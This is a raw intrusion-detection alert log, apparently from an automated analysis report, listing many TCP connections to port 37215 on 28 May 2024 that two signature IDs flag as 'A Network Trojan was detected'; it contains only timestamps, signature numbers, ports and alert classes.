          Timestamp:05/28/24-14:47:25.266703
          SID:2835222
          Source Port:54284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664476
          SID:2829579
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869134
          SID:2835222
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067212
          SID:2829579
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861473
          SID:2835222
          Source Port:42996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939596
          SID:2835222
          Source Port:57208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229408
          SID:2829579
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061113
          SID:2835222
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117188
          SID:2829579
          Source Port:56858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272328
          SID:2829579
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426509
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483546
          SID:2829579
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214478
          SID:2835222
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105427
          SID:2829579
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780763
          SID:2835222
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925618
          SID:2829579
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214823
          SID:2829579
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044601
          SID:2835222
          Source Port:42410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887990
          SID:2829579
          Source Port:34426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434852
          SID:2829579
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839363
          SID:2829579
          Source Port:50588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325738
          SID:2835222
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283934
          SID:2835222
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617003
          SID:2829579
          Source Port:46720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594993
          SID:2835222
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473294
          SID:2829579
          Source Port:43842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415857
          SID:2835222
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597436
          SID:2829579
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272315
          SID:2829579
          Source Port:52544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973175
          SID:2829579
          Source Port:49720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123713
          SID:2835222
          Source Port:48848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797929
          SID:2829579
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201513
          SID:2835222
          Source Port:50346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140131
          SID:2829579
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729118
          SID:2835222
          Source Port:45550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908025
          SID:2835222
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684953
          SID:2835222
          Source Port:34730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215108
          SID:2829579
          Source Port:56270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689414
          SID:2835222
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465283
          SID:2835222
          Source Port:46314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597630
          SID:2835222
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532923
          SID:2835222
          Source Port:50792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614596
          SID:2829579
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472460
          SID:2829579
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188062
          SID:2829579
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847533
          SID:2835222
          Source Port:56762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846934
          SID:2835222
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710136
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932697
          SID:2829579
          Source Port:37770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273542
          SID:2835222
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161783
          SID:2835222
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144104
          SID:2835222
          Source Port:34464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271071
          SID:2829579
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841598
          SID:2835222
          Source Port:50126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206967
          SID:2835222
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2829579
          Source Port:37360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629325
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210679
          SID:2829579
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992289
          SID:2829579
          Source Port:41630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.291085
          SID:2829579
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150764
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820225
          SID:2829579
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689527
          SID:2829579
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811678
          SID:2829579
          Source Port:55870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976536
          SID:2835222
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978383
          SID:2835222
          Source Port:53398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.093075
          SID:2835222
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591165
          SID:2835222
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281793
          SID:2835222
          Source Port:35814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561002
          SID:2835222
          Source Port:46224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299010
          SID:2829579
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299471
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271634
          SID:2829579
          Source Port:49342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405332
          SID:2835222
          Source Port:40378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530059
          SID:2829579
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680397
          SID:2829579
          Source Port:39940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529191
          SID:2829579
          Source Port:36066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764569
          SID:2835222
          Source Port:38414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273336
          SID:2829579
          Source Port:55372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903341
          SID:2835222
          Source Port:41566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062874
          SID:2829579
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465271
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.773822
          SID:2835222
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115644
          SID:2835222
          Source Port:55370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669055
          SID:2829579
          Source Port:34636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328082
          SID:2835222
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498893
          SID:2835222
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605102
          SID:2829579
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944975
          SID:2835222
          Source Port:36934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976436
          SID:2835222
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156751
          SID:2835222
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191968
          SID:2835222
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114221
          SID:2835222
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290315
          SID:2829579
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878341
          SID:2829579
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357147
          SID:2829579
          Source Port:38268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188084
          SID:2835222
          Source Port:40100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864250
          SID:2835222
          Source Port:54418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598907
          SID:2829579
          Source Port:40674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.291083
          SID:2835222
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739472
          SID:2835222
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241144
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176483
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949192
          SID:2835222
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187908
          SID:2829579
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626846
          SID:2835222
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651312
          SID:2829579
          Source Port:52438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271659
          SID:2835222
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125362
          SID:2835222
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732042
          SID:2835222
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845067
          SID:2835222
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203803
          SID:2835222
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443992
          SID:2835222
          Source Port:38702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102997
          SID:2829579
          Source Port:40428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843571
          SID:2829579
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159747
          SID:2835222
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085442
          SID:2829579
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215354
          SID:2829579
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652414
          SID:2835222
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536978
          SID:2835222
          Source Port:34906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077708
          SID:2835222
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.318979
          SID:2835222
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815441
          SID:2835222
          Source Port:53294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592484
          SID:2829579
          Source Port:56394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352815
          SID:2835222
          Source Port:59772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.240827
          SID:2835222
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724027
          SID:2829579
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681127
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797047
          SID:2829579
          Source Port:40748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125781
          SID:2835222
          Source Port:50216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846991
          SID:2829579
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328875
          SID:2829579
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852706
          SID:2829579
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796888
          SID:2829579
          Source Port:48948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741646
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135984
          SID:2835222
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877069
          SID:2835222
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660428
          SID:2835222
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226536
          SID:2829579
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214864
          SID:2829579
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816729
          SID:2829579
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764741
          SID:2829579
          Source Port:50026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711081
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080624
          SID:2835222
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628491
          SID:2835222
          Source Port:41086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554473
          SID:2829579
          Source Port:56936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211388
          SID:2829579
          Source Port:57046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528898
          SID:2829579
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496778
          SID:2835222
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711225
          SID:2829579
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793374
          SID:2835222
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980737
          SID:2835222
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164474
          SID:2835222
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689974
          SID:2829579
          Source Port:34236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943181
          SID:2835222
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671736
          SID:2829579
          Source Port:43776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147599
          SID:2835222
          Source Port:58876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320970
          SID:2835222
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566438
          SID:2829579
          Source Port:49790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756521
          SID:2835222
          Source Port:55794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842194
          SID:2829579
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743650
          SID:2829579
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671767
          SID:2829579
          Source Port:44676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847352
          SID:2835222
          Source Port:34116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065038
          SID:2829579
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772194
          SID:2829579
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551208
          SID:2835222
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048783
          SID:2835222
          Source Port:41608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143807
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594197
          SID:2829579
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923734
          SID:2829579
          Source Port:38210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277999
          SID:2829579
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342018
          SID:2835222
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890809
          SID:2835222
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876137
          SID:2835222
          Source Port:56470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738441
          SID:2829579
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124685
          SID:2835222
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473580
          SID:2829579
          Source Port:58504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.469705
          SID:2835222
          Source Port:55710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033163
          SID:2829579
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196858
          SID:2829579
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943208
          SID:2835222
          Source Port:56564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182942
          SID:2835222
          Source Port:43664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480324
          SID:2835222
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941393
          SID:2835222
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186154
          SID:2835222
          Source Port:51898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.088843
          SID:2835222
          Source Port:56850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176708
          SID:2835222
          Source Port:58058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364122
          SID:2835222
          Source Port:50302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890609
          SID:2829579
          Source Port:38562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177207
          SID:2835222
          Source Port:52526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725127
          SID:2835222
          Source Port:59828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341839
          SID:2835222
          Source Port:48476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.753177
          SID:2835222
          Source Port:53716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117264
          SID:2835222
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437120
          SID:2829579
          Source Port:53794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527869
          SID:2835222
          Source Port:46338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111291
